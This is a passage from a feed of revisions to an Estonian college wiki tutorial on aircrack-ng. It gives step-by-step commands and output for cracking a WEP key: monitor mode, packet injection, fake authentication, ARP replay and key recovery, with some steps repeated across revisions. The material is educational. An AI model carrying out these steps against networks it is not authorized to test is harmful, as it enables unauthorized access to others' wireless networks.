eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89320</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89320"/>
		<updated>2015-05-25T19:41:37Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Lühikesed tegevussammud */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
